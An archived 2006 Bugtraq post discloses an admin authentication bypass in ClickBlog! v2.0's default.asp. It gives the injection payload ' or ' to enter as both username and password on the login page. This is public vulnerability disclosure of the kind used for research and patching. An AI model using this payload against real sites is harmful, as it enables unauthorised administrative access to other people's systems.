[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection
From: ajannhwt@xxxxxxxxxxx
Date: 14 Sep 2006 20:02:42 -0000

ENGLISH

# Title  :  ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection

# Author :   ajann

# Exploit;

//Before join login page
http://[target]/[path]/default.asp

Username : ' or '
Password : ' or ' and Login Ok

# ajann,Turkey

Prev by Date: [SECURITY] [DSA 1177-1] New usermin packages fix denial of service
Next by Date: mcLinksCounter v1.1 - Remote File Include Vulnerabilities
Previous by thread: [SECURITY] [DSA 1177-1] New usermin packages fix denial of service
Next by thread: mcLinksCounter v1.1 - Remote File Include Vulnerabilities
Index(es):
- Date
- Thread